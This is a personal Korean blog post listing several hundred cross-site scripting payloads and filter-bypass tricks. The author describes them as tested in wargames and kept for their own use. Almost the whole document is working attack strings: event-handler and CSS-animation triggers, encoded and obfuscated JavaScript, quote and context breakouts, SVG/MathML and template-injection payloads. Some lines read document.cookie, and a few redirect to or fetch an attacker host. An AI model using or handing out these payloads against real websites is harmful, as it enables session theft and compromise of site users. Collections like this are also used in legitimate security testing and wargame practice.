XSS Payloads and Filter Bypass

Ccr3t·2025년 11월 24일
Study

목록 보기
3/3
[2025.11.24.(월) 초안]
ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ
"><script>alert(1)</script>
"><script>confirm(1)</script>
%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
%3Cscript%3Ealert(1)%3C%2Fscript%3E
'><img src=x onerror=alert(1)>
<body onload=alert(1)>
<details open ontoggle=alert(1)>
<iframe src="javascript:alert(1)"></iframe>
<img src=x onerror=alert(1)>
<script>alert(1)</script>
<script>document.body.innerHTML="<img src=x onerror=alert(1)>"</script>
<script>document.write("<img src=x onerror=alert(1)>")</script>
<script>eval("alert(1)")</script>
<script>prompt(document.cookie)</script>
<svg/onload=alert(1)>
<svg><foreignObject><iframe srcdoc="<script>alert(1)</script>"></iframe></foreignObject></svg>
<video><source onerror="alert(1)">
"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y
<image/src/onerror=prompt(8)>
<img/src/onerror=prompt(8)>
<image src/onerror=prompt(8)>
<img src/onerror=prompt(8)>
<image src =q onerror=prompt(8)>
<img src =q onerror=prompt(8)>
</scrip</script>t><img src =q onerror=prompt(8)>
<svg onload=alert(1)>
"><svg onload=alert(1)//
</script><svg onload=alert(1)>
<iframe src=javascript:alert(1)>
<svg><script xlink:href=data:,alert(1) />
"><img src=1 onerror=alert(1)>.gif
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
<body onpageshow=alert(1)>
<body onresize=alert(1)>press F12!
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<audio src/onerror=alert(1)>
<body onerror=alert(1) onload=/>
<body onmessage=alert(1)>
<body onmousedown="alert(1)">test</body>
<body onmouseenter="alert(1)">test</body>
<body onmouseleave="alert(1)">test</body>
<body onmousemove="alert(1)">test</body>
<body onmouseout="alert(1)">test</body>
<body onmouseover="alert(1)">test</body>
<body onmouseup="alert(1)">test</body>
<body onpaste="alert(1)" contenteditable>test</body>
<body onpopstate=alert(1)>
<body onresize="alert(1)">
<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>
<body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>
<body onwheel=alert(1)>
<br draggable="true" ondrag="alert(1)">test</br>
<br draggable="true" ondragend="alert(1)">test</br>
<br draggable="true" ondragenter="alert(1)">test</br>
<br draggable="true" ondragleave="alert(1)">test</br>
<br draggable="true" ondragstart="alert(1)">test</br>
<br id=x tabindex=1 onactivate=alert(1)></br>
<br id=x tabindex=1 onbeforeactivate=alert(1)></br>
<br id=x tabindex=1 onbeforedeactivate=alert(1)></br>#<input autofocus>
<br id=x tabindex=1 ondeactivate=alert(1)></br>#<input id=y autofocus>
<br id=x tabindex=1 onfocus=alert(1)></br>
<br id=x tabindex=1 onfocusin=alert(1)></br>
<br onbeforecopy="alert(1)" contenteditable>test</br>
<br onbeforecut="alert(1)" contenteditable>test</br>
<br onbeforepaste="alert(1)" contenteditable>test</br>
<br onblur=alert(1) tabindex=1 id=x></br>#<input autofocus>
<br onclick="alert(1)">test</br>
<br oncontextmenu="alert(1)">test</br>
<br oncopy="alert(1)" contenteditable>test</br>
<br oncut="alert(1)" contenteditable>test</br>
<br ondblclick="alert(1)">test</br>
<br onfocusout=alert(1) tabindex=1 id=x></br>#<input autofocus>
<br onkeydown="alert(1)" contenteditable>test</br>
<br onkeypress="alert(1)" contenteditable>test</br>
<br onkeyup="alert(1)" contenteditable>test</br>
<br onmousedown="alert(1)">test</br>
<br onmouseenter="alert(1)">test</br>
<br onmouseleave="alert(1)">test</br>
<br onmousemove="alert(1)">test</br>
<br onmouseout="alert(1)">test</br>
<br onmouseover="alert(1)">test</br>
<br onmouseup="alert(1)">test</br>
<br onpaste="alert(1)" contenteditable>test</br>
<button autofocus onfocus=alert(1)>test</button>
<button autofocus onfocusin=alert(1)>test</button>
<button draggable="true" ondrag="alert(1)">test</button>
<button draggable="true" ondragend="alert(1)">test</button>
<button draggable="true" ondragenter="alert(1)">test</button>
<button draggable="true" ondragleave="alert(1)">test</button>
<button draggable="true" ondragstart="alert(1)">test</button>
<button id=x tabindex=1 onactivate=alert(1)></button>
<button id=x tabindex=1 onbeforeactivate=alert(1)></button>
<button id=x tabindex=1 onbeforedeactivate=alert(1)></button>#<input autofocus>
<button id=x tabindex=1 ondeactivate=alert(1)></button>#<input id=y autofocus>
<button onbeforecopy="alert(1)" contenteditable>test</button>
<button onbeforecut="alert(1)" contenteditable>test</button>
<button onbeforepaste="alert(1)" contenteditable>test</button>
<button onblur=alert(1) id=x></button>#<input autofocus>
<button onclick="alert(1)">test</button>
<button oncontextmenu="alert(1)">test</button>
<button oncopy="alert(1)" contenteditable>test</button>
<button oncut="alert(1)" contenteditable>test</button>
<dfn draggable="true" ondrag="alert(1)">test</dfn>
<embed src=1 onerror=alert(1) type=image/gif>
<iframe onload=alert(1)></iframe>
<image src/onerror=alert(1)>
<img draggable="true" ondrag="alert(1)">test</img>
<img src/onerror=alert(1)>
<img srcset=validimage.png onload=alert(1)>
<img srcset=1 onerror=alert(1)>
<link href=validstyles.css rel=stylesheet onload=alert(1)>
<listing onmouseenter="alert(1)">test</listing>
<marquee onmouseenter="alert(1)">test</marquee>
<menu onmouseenter="alert(1)">test</menu>
<nav onmouseenter="alert(1)">test</nav><object data=/ onreadystatechange=alert(1)>
<object data=/ onload=alert(1)>
<ol onmouseenter="alert(1)">test</ol>
<p onmouseenter="alert(1)">test</p><script onmousedown="alert(1)">test</script>
<script onload=alert(1) src=validjs.js></script>
<select autofocus onfocusin=alert(1)>
<select draggable="true" ondrag="alert(1)">test</select>
<select autofocus onfocus=alert(1)>
<style onmousedown="alert(1)">test</style>
<style onload=alert(1)></style>
<style>@keyframes x{}</style><abbr style="animation-name:x" onanimationend="alert(1)"></abbr>
<style>@keyframes x{}</style><acronym style="animation-name:x" onanimationend="alert(1)"></acronym>
<style>@keyframes x{}</style><address style="animation-name:x" onanimationend="alert(1)"></address>
<style>@keyframes x{}</style><applet style="animation-name:x" onanimationend="alert(1)"></applet>
<style>@keyframes x{}</style><area style="animation-name:x" onanimationend="alert(1)"></area>
<style>@keyframes x{}</style><article style="animation-name:x" onanimationend="alert(1)"></article>
<style>@keyframes x{}</style><aside style="animation-name:x" onanimationend="alert(1)"></aside>
<style>@keyframes x{}</style><b style="animation-name:x" onanimationstart="alert(1)"></b>
<style>@keyframes x{}</style><bdi style="animation-name:x" onanimationstart="alert(1)"></bdi>
<style>@keyframes x{}</style><bdo style="animation-name:x" onanimationend="alert(1)"></bdo>
<style>@keyframes x{}</style><bgsound style="animation-name:x" onanimationend="alert(1)"></bgsound>
<style>@keyframes x{}</style><big style="animation-name:x" onanimationend="alert(1)"></big>
<style>@keyframes x{}</style><blink style="animation-name:x" onanimationend="alert(1)"></blink>
<style>@keyframes x{}</style><blockquote style="animation-name:x" onanimationend="alert(1)"></blockquote>
<style>@keyframes x{}</style><body style="animation-name:x" onanimationend="alert(1)"></body>
<style>@keyframes x{}</style><br style="animation-name:x" onanimationend="alert(1)"></br>
<style>@keyframes x{}</style><button style="animation-name:x" onanimationend="alert(1)"></button>
<style>@keyframes x{}</style><canvas style="animation-name:x" onanimationend="alert(1)"></canvas>
<style>@keyframes x{}</style><center style="animation-name:x" onanimationstart="alert(1)"></center>
<style>@keyframes x{}</style><cite style="animation-name:x" onanimationend="alert(1)"></cite>
<style>@keyframes x{}</style><cite style="animation-name:x" onanimationstart="alert(1)"></cite>
<style>@keyframes x{}</style><code style="animation-name:x" onanimationend="alert(1)"></code>
<style>@keyframes x{}</style><command style="animation-name:x" onanimationstart="alert(1)"></command>
<style>@keyframes x{}</style><content style="animation-name:x" onanimationstart="alert(1)"></content>
<style>@keyframes x{}</style><data style="animation-name:x" onanimationend="alert(1)"></data>
<style>@keyframes x{}</style><dd style="animation-name:x" onanimationend="alert(1)"></dd>
<style>@keyframes x{}</style><del style="animation-name:x" onanimationend="alert(1)"></del>
<style>@keyframes x{}</style><del style="animation-name:x" onanimationstart="alert(1)"></del>
<style>@keyframes x{}</style><details style="animation-name:x" onanimationend="alert(1)"></details>
<style>@keyframes x{}</style><details style="animation-name:x" onanimationstart="alert(1)"></details>
<style>@keyframes x{}</style><dfn style="animation-name:x" onanimationstart="alert(1)"></dfn>
<style>@keyframes x{}</style><dir style="animation-name:x" onanimationstart="alert(1)"></dir>
<style>@keyframes x{}</style><div style="animation-name:x" onanimationend="alert(1)"></div>
<style>@keyframes x{}</style><div style="animation-name:x" onanimationstart="alert(1)"></div>
<style>@keyframes x{}</style><dl style="animation-name:x" onanimationstart="alert(1)"></dl>
<style>@keyframes x{}</style><dt style="animation-name:x" onanimationend="alert(1)"></dt>
<style>@keyframes x{}</style><dt style="animation-name:x" onanimationstart="alert(1)"></dt>
<style>@keyframes x{}</style><element style="animation-name:x" onanimationend="alert(1)"></element>
<style>@keyframes x{}</style><element style="animation-name:x" onanimationstart="alert(1)"></element>
<style>@keyframes x{}</style><em style="animation-name:x" onanimationend="alert(1)"></em>
<style>@keyframes x{}</style><em style="animation-name:x" onanimationstart="alert(1)"></em>
<style>@keyframes x{}</style><embed style="animation-name:x" onanimationend="alert(1)"></embed>
<style>@keyframes x{}</style><fieldset style="animation-name:x" onanimationend="alert(1)"></fieldset>
<style>@keyframes x{}</style><fieldset style="animation-name:x" onanimationstart="alert(1)"></fieldset>
<style>@keyframes x{}</style><figcaption style="animation-name:x" onanimationend="alert(1)"></figcaption>
<style>@keyframes x{}</style><figcaption style="animation-name:x" onanimationstart="alert(1)"></figcaption>
<style>@keyframes x{}</style><figure style="animation-name:x" onanimationend="alert(1)"></figure>
<style>@keyframes x{}</style><font style="animation-name:x" onanimationend="alert(1)"></font>
<style>@keyframes x{}</style><font style="animation-name:x" onanimationstart="alert(1)"></font>
<style>@keyframes x{}</style><footer style="animation-name:x" onanimationstart="alert(1)"></footer>
<style>@keyframes x{}</style><form style="animation-name:x" onanimationend="alert(1)"></form>
<style>@keyframes x{}</style><form style="animation-name:x" onanimationstart="alert(1)"></form>
<style>@keyframes x{}</style><h1 style="animation-name:x" onanimationend="alert(1)"></h1>
<style>@keyframes x{}</style><h1 style="animation-name:x" onanimationstart="alert(1)"></h1>
<style>@keyframes x{}</style><header style="animation-name:x" onanimationstart="alert(1)"></header>
<style>@keyframes x{}</style><hgroup style="animation-name:x" onanimationend="alert(1)"></hgroup>
<style>@keyframes x{}</style><hgroup style="animation-name:x" onanimationstart="alert(1)"></hgroup>
<style>@keyframes x{}</style><hr style="animation-name:x" onanimationend="alert(1)"></hr>
<style>@keyframes x{}</style><hr style="animation-name:x" onanimationstart="alert(1)"></hr>
<style>@keyframes x{}</style><html style="animation-name:x" onanimationstart="alert(1)"></html>
<style>@keyframes x{}</style><i style="animation-name:x" onanimationend="alert(1)"></i>
<style>@keyframes x{}</style><i style="animation-name:x" onanimationstart="alert(1)"></i>
<style>@keyframes x{}</style><iframe style="animation-name:x" onanimationend="alert(1)"></iframe>
<style>@keyframes x{}</style><iframe style="animation-name:x" onanimationstart="alert(1)"></iframe>
<style>@keyframes x{}</style><image style="animation-name:x" onanimationend="alert(1)"></image>
<style>@keyframes x{}</style><image style="animation-name:x" onanimationstart="alert(1)"></image>
<style>@keyframes x{}</style><img style="animation-name:x" onanimationend="alert(1)"></img>
<style>@keyframes x{}</style><img style="animation-name:x" onanimationstart="alert(1)"></img>
<style>@keyframes x{}</style><ins style="animation-name:x" onanimationend="alert(1)"></ins>
<style>@keyframes x{}</style><ins style="animation-name:x" onanimationstart="alert(1)"></ins>
<style>@keyframes x{}</style><isindex style="animation-name:x" onanimationend="alert(1)"></isindex>
<style>@keyframes x{}</style><isindex style="animation-name:x" onanimationstart="alert(1)"></isindex>
<style>@keyframes x{}</style><kbd style="animation-name:x" onanimationend="alert(1)"></kbd>
<style>@keyframes x{}</style><kbd style="animation-name:x" onanimationstart="alert(1)"></kbd>
<style>@keyframes x{}</style><keygen style="animation-name:x" onanimationend="alert(1)"></keygen>
<style>@keyframes x{}</style><keygen style="animation-name:x" onanimationstart="alert(1)"></keygen>
<style>@keyframes x{}</style><label style="animation-name:x" onanimationend="alert(1)"></label>
<style>@keyframes x{}</style><label style="animation-name:x" onanimationstart="alert(1)"></label>
<style>@keyframes x{}</style><legend style="animation-name:x" onanimationend="alert(1)"></legend>
<style>@keyframes x{}</style><legend style="animation-name:x" onanimationstart="alert(1)"></legend>
<style>@keyframes x{}</style><li style="animation-name:x" onanimationend="alert(1)"></li>
<style>@keyframes x{}</style><li style="animation-name:x" onanimationstart="alert(1)"></li>
<style>@keyframes x{}</style><listing style="animation-name:x" onanimationend="alert(1)"></listing>
<style>@keyframes x{}</style><listing style="animation-name:x" onanimationstart="alert(1)"></listing>
<style>@keyframes x{}</style><main style="animation-name:x" onanimationend="alert(1)"></main>
<style>@keyframes x{}</style><mark style="animation-name:x" onanimationend="alert(1)"></mark>
<style>@keyframes x{}</style><mark style="animation-name:x" onanimationstart="alert(1)"></mark>
<style>@keyframes x{}</style><marquee style="animation-name:x" onanimationend="alert(1)"></marquee>
<style>@keyframes x{}</style><marquee style="animation-name:x" onanimationstart="alert(1)"></marquee>
<style>@keyframes x{}</style><menu style="animation-name:x" onanimationstart="alert(1)"></menu>
<style>@keyframes x{}</style><menuitem style="animation-name:x" onanimationend="alert(1)"></menuitem>
<style>@keyframes x{}</style><menuitem style="animation-name:x" onanimationstart="alert(1)"></menuitem>
<style>@keyframes x{}</style><meter style="animation-name:x" onanimationend="alert(1)"></meter>
<style>@keyframes x{}</style><multicol style="animation-name:x" onanimationend="alert(1)"></multicol>
<style>@keyframes x{}</style><multicol style="animation-name:x" onanimationstart="alert(1)"></multicol>
<style>@keyframes x{}</style><nav style="animation-name:x" onanimationend="alert(1)"></nav>
<style>@keyframes x{}</style><nav style="animation-name:x" onanimationstart="alert(1)"></nav>
<style>@keyframes x{}</style><nextid style="animation-name:x" onanimationend="alert(1)"></nextid>
<style>@keyframes x{}</style><nextid style="animation-name:x" onanimationstart="alert(1)"></nextid>
<style>@keyframes x{}</style><nobr style="animation-name:x" onanimationstart="alert(1)"></nobr>
<style>@keyframes x{}</style><noscript style="animation-name:x" onanimationend="alert(1)"></noscript>
<style>@keyframes x{}</style><noscript style="animation-name:x" onanimationstart="alert(1)"></noscript>
<style>@keyframes x{}</style><object style="animation-name:x" onanimationend="alert(1)"></object>
<style>@keyframes x{}</style><object style="animation-name:x" onanimationstart="alert(1)"></object>
<style>@keyframes x{}</style><ol style="animation-name:x" onanimationend="alert(1)"></ol>
<style>@keyframes x{}</style><ol style="animation-name:x" onanimationstart="alert(1)"></ol>
<style>@keyframes x{}</style><optgroup style="animation-name:x" onanimationstart="alert(1)"></optgroup>
<style>@keyframes x{}</style><option style="animation-name:x" onanimationend="alert(1)"></option>
<style>@keyframes x{}</style><option style="animation-name:x" onanimationstart="alert(1)"></option>
<style>@keyframes x{}</style><output style="animation-name:x" onanimationstart="alert(1)"></output>
<style>@keyframes x{}</style><p style="animation-name:x" onanimationend="alert(1)"></p>
<style>@keyframes x{}</style><p style="animation-name:x" onanimationstart="alert(1)"></p>
<style>@keyframes x{}</style><picture style="animation-name:x" onanimationend="alert(1)"></picture>
<style>@keyframes x{}</style><picture style="animation-name:x" onanimationstart="alert(1)"></picture>
<style>@keyframes x{}</style><plaintext style="animation-name:x" onanimationend="alert(1)"></plaintext>
<style>@keyframes x{}</style><plaintext style="animation-name:x" onanimationstart="alert(1)"></plaintext>
<style>@keyframes x{}</style><pre style="animation-name:x" onanimationend="alert(1)"></pre>
<style>@keyframes x{}</style><pre style="animation-name:x" onanimationstart="alert(1)"></pre>
<style>@keyframes x{}</style><progress style="animation-name:x" onanimationstart="alert(1)"></progress>
<style>@keyframes x{}</style><q style="animation-name:x" onanimationstart="alert(1)"></q>
<style>@keyframes x{}</style><rb style="animation-name:x" onanimationend="alert(1)"></rb>
<style>@keyframes x{}</style><rb style="animation-name:x" onanimationstart="alert(1)"></rb>
<style>@keyframes x{}</style><rt style="animation-name:x" onanimationend="alert(1)"></rt>
<style>@keyframes x{}</style><rt style="animation-name:x" onanimationstart="alert(1)"></rt>
<style>@keyframes x{}</style><rtc style="animation-name:x" onanimationend="alert(1)"></rtc>
<style>@keyframes x{}</style><rtc style="animation-name:x" onanimationstart="alert(1)"></rtc>
<style>@keyframes x{}</style><ruby style="animation-name:x" onanimationend="alert(1)"></ruby>
<style>@keyframes x{}</style><ruby style="animation-name:x" onanimationstart="alert(1)"></ruby>
<style>@keyframes x{}</style><s style="animation-name:x" onanimationend="alert(1)"></s>
<style>@keyframes x{}</style><s style="animation-name:x" onanimationstart="alert(1)"></s>
<style>@keyframes x{}</style><samp style="animation-name:x" onanimationend="alert(1)"></samp>
<style>@keyframes x{}</style><samp style="animation-name:x" onanimationstart="alert(1)"></samp>
<style>@keyframes x{}</style><section style="animation-name:x" onanimationend="alert(1)"></section>
<style>@keyframes x{}</style><section style="animation-name:x" onanimationstart="alert(1)"></section>
<style>@keyframes x{}</style><select style="animation-name:x" onanimationend="alert(1)"></select>
<style>@keyframes x{}</style><select style="animation-name:x" onanimationstart="alert(1)"></select>
<style>@keyframes x{}</style><shadow style="animation-name:x" onanimationend="alert(1)"></shadow>
<style>@keyframes x{}</style><shadow style="animation-name:x" onanimationstart="alert(1)"></shadow>
<style>@keyframes x{}</style><slot style="animation-name:x" onanimationend="alert(1)"></slot>
<style>@keyframes x{}</style><slot style="animation-name:x" onanimationstart="alert(1)"></slot>
<style>@keyframes x{}</style><small style="animation-name:x" onanimationend="alert(1)"></small>
<style>@keyframes x{}</style><small style="animation-name:x" onanimationstart="alert(1)"></small>
<style>@keyframes x{}</style><source style="animation-name:x" onanimationend="alert(1)"></source>
<style>@keyframes x{}</style><source style="animation-name:x" onanimationstart="alert(1)"></source>
<style>@keyframes x{}</style><spacer style="animation-name:x" onanimationend="alert(1)"></spacer>
<style>@keyframes x{}</style><spacer style="animation-name:x" onanimationstart="alert(1)"></spacer>
<style>@keyframes x{}</style><span style="animation-name:x" onanimationend="alert(1)"></span>
<style>@keyframes x{}</style><span style="animation-name:x" onanimationstart="alert(1)"></span>
<style>@keyframes x{}</style><strike style="animation-name:x" onanimationend="alert(1)"></strike>
<style>@keyframes x{}</style><strike style="animation-name:x" onanimationstart="alert(1)"></strike>
<style>@keyframes x{}</style><strong style="animation-name:x" onanimationstart="alert(1)"></strong>
<style>@keyframes x{}</style><sub style="animation-name:x" onanimationend="alert(1)"></sub>
<style>@keyframes x{}</style><sub style="animation-name:x" onanimationstart="alert(1)"></sub>
<style>@keyframes x{}</style><summary style="animation-name:x" onanimationend="alert(1)"></summary>
<style>@keyframes x{}</style><summary style="animation-name:x" onanimationstart="alert(1)"></summary>
<style>@keyframes x{}</style><sup style="animation-name:x" onanimationend="alert(1)"></sup>
<style>@keyframes x{}</style><sup style="animation-name:x" onanimationstart="alert(1)"></sup>
<style>@keyframes x{}</style><svg style="animation-name:x" onanimationend="alert(1)"></svg>
<style>@keyframes x{}</style><svg style="animation-name:x" onanimationstart="alert(1)"></svg>
<style>@keyframes x{}</style><table style="animation-name:x" onanimationend="alert(1)"></table>
<style>@keyframes x{}</style><table style="animation-name:x" onanimationstart="alert(1)"></table>
<style>@keyframes x{}</style><time style="animation-name:x" onanimationend="alert(1)"></time>
<style>@keyframes x{}</style><time style="animation-name:x" onanimationstart="alert(1)"></time>
<style>@keyframes x{}</style><track style="animation-name:x" onanimationend="alert(1)"></track>
<style>@keyframes x{}</style><track style="animation-name:x" onanimationstart="alert(1)"></track>
<style>@keyframes x{}</style><tt style="animation-name:x" onanimationend="alert(1)"></tt>
<style>@keyframes x{}</style><tt style="animation-name:x" onanimationstart="alert(1)"></tt>
<style>@keyframes x{}</style><u style="animation-name:x" onanimationend="alert(1)"></u>
<style>@keyframes x{}</style><u style="animation-name:x" onanimationstart="alert(1)"></u>
<style>@keyframes x{}</style><ul style="animation-name:x" onanimationend="alert(1)"></ul>
<style>@keyframes x{}</style><ul style="animation-name:x" onanimationstart="alert(1)"></ul>
<style>@keyframes x{}</style><var style="animation-name:x" onanimationend="alert(1)"></var>
<style>@keyframes x{}</style><var style="animation-name:x" onanimationstart="alert(1)"></var>
<style>@keyframes x{}</style><video style="animation-name:x" onanimationend="alert(1)"></video>
<style>@keyframes x{}</style><wbr style="animation-name:x" onanimationend="alert(1)"></wbr>
<style>@keyframes x{}</style><wbr style="animation-name:x" onanimationstart="alert(1)"></wbr>
<style>@keyframes x{}</style><xmp style="animation-name:x" onanimationend="alert(1)"></xmp>
<style>@keyframes x{}</style><xmp style="animation-name:x" onanimationstart="alert(1)"></xmp>
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss>
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss>
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
<image srcset=1 onerror=alert(1)>
<input type=image src=1 onerror=alert(1)>
<video><source onerror=alert(1) src=1></video>
<input autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>test</textarea>
<video controls src=1 onfocus=alert(1) autofocus>
<audio id=x controls onfocus=alert(1) id=x><source src="validaudio.wav"></audio>
<audio controls src=1 onfocus=alert(1) autofocus>
<a autofocus onfocus=alert(1) href></a>
<input autofocus onfocusin=alert(1)>
<textarea autofocus onfocusin=alert(1)>test</textarea>
<video controls src=1 onfocusin=alert(1) autofocus>
<audio id=x controls onfocusin=alert(1) id=x><source src="validaudio.wav"></audio>
<audio controls src=1 onfocusin=alert(1) autofocus>
<form onformdata="alert(1)"><button>Click</button></form>
<body onmessage=print()>
<audio controls onprogress=alert(1)><source src=validaudio.mp3 type=audio/mpeg></audio>
<audio controls onsuspend=alert(1)><source src=validaudio.mp3 type=audio/mpeg></audio>


# ===============================
# Extra XSS bypass payloads 2025
# (contexts, encodings, tricks) 
# ===============================

# 1) Basic tag / attribute / javascript: protocol variants
<img src=x onerror=alert`1`>
<img src=x onerror=alert?.(1)>
<img src=x onerror=window['al'+'ert'](1)>
<img src=x onerror=top['al'+'ert'](1)>
<img src=x onerror=parent['al'+'ert'](1)>
<img src=x onerror=(alert)(1)>
<img src=x onerror=alert(1)//
<img src=x onerror=alert(1)><!--
<svg/onload=alert`1`>
<svg/onload=confirm(1)>
<svg/onload=prompt(1)>
<svg><script>alert(1)</script>
<iframe src=javascript:alert(1)>
<iframe srcdoc='<script>alert(1)</script>'></iframe>
<a href=javascript:alert(1)>X</a>
<a href=JaVaScRiPt:alert(1)>X</a>
<a href=javascript:confirm(1)>X</a>
<a href='javascript:alert(1)'>click</a>
<a href="javascript:alert(1)">click</a>
javascript:alert(1)

# 2) Common event handler + inline JS variants
" onmouseover=alert(1) x="
' onmouseover=alert(1) x='
" autofocus onfocus=alert(1) x="
' autofocus onfocus=alert(1) x='
<input onfocus=alert(1) autofocus>
<textarea onfocus=alert(1) autofocus>test</textarea>
<select onfocus=alert(1) autofocus><option>1
<video autoplay onloadstart=alert(1) src=x>
<audio autoplay onloadstart=alert(1) src=x>
<body onload=alert(1)>
<body onfocus=alert(1) tabindex=0>
<body onclick=alert(1)>click</body>

# 3) Quote / context breakout patterns
">alert(1)//
" autofocus onfocus=alert(1) x="
'></script><script>alert(1)</script>
';alert(1);//
';alert(String.fromCharCode(49));//
";alert(1);//
`;alert(1);//
</script><script>alert(1)</script>
</textarea><script>alert(1)</script>
</style><script>alert(1)</script>

# 4) Encoded / obfuscated JS
<img src=x onerror=eval('al'+'ert(1)')>
<img src=x onerror=window[`al`+`ert`](1)>
<img src=x onerror=Function('alert(1)')()>
<img src=x onerror=window[atob('YWxlcnQ=')](1)>
<img src=x onerror=eval(atob('YWxlcnQoMSk='))>
%3Cimg%20src%3Dx%20onerror%3Dalert%26%230040%3B1%26%230041%3B%3E
%3Cscript%3Ealert%26%230040%3B1%26%230041%3B%3C%2Fscript%3E
%3Csvg%2Fonload%3Dalert%26%230040%3B1%26%230041%3B%3E

# 5) No <script> / no angle bracket payloads
alert(1)
confirm(1)
'-alert(1)-'
';alert(1);//
"-alert(1)-"
';window.location='//attacker';//
';fetch('//attacker')//
";fetch('//attacker')//
');alert(1);//
'));alert(1);//
]);alert(1)//
`;alert(1)//

# 6) DOM XSS helper payloads
# use in fragment: http://victim/#<payload>
" autofocus onfocus=alert(location) x="
" autofocus onfocus=alert(location.hash) x="
" autofocus onfocus=alert(document.URL) x="
" autofocus onfocus=alert(document.domain) x="

# 7) Comment / malformed tag tricks
<!--><img src=x onerror=alert(1)>
--><img src=x onerror=alert(1)>
<!----><svg/onload=alert(1)>
</x><img src=x onerror=alert(1)>
</x><svg/onload=alert(1)>
<x/><img src=x onerror=alert(1)>
<x id="--><img src=x onerror=alert(1)>">

# 8) SVG / MathML contexts
<svg><a xlink:href="javascript:alert(1)">X</a></svg>
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
<svg><foreignObject><body onload=alert(1)></body></foreignObject></svg>
<math><mtext></mtext><annotation-xml><script>alert(1)</script></annotation-xml></math>

# 9) HREF / SRC attribute injections
" href=javascript:alert(1) x="
' href=javascript:alert(1) x='
" src=javascript:alert(1) x="
data:text/html,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

# 10) Template-oriented payloads
{{constructor.constructor('alert(1)')()}}
{{this.constructor.constructor('alert(1)')()}}
${alert(1)}
${{alert(1)}}
<%= alert(1) %>
<%_ alert(1) %>

# 11) CSS / url() weird cases
<style>body{background-image:url("javascript:alert(1)")}</style>
<style>@import 'javascript:alert(1)';</style>

# 12) Miscellaneous browser/event edge cases
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
<details open ontoggle=alert(1)>X</details>
<marquee onstart=alert(1)>X</marquee>
<svg><animate attributeName=x onbegin=alert(1) dur=1s></animate></svg>
ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ
XSS Testerㅤ
내가 사용하기 위해 만든 XSS Payloads 및 filter bypass 목록
Wargame 테스트 직접 해보고 되는 것만 넣었습니다.
추가로 문제 풀다가 되는거 발견하면 계속 업데이트 할 예정
이상 보고 끝!
Ccr3t
웹해킹을 잘 못 하지만 좋아 하려고 노력하는 한 젊은이.
이전 포스트
XSS Payloads and Filter Bypass

Study

[1-Day]CVE-2021-41773

0개의 댓글
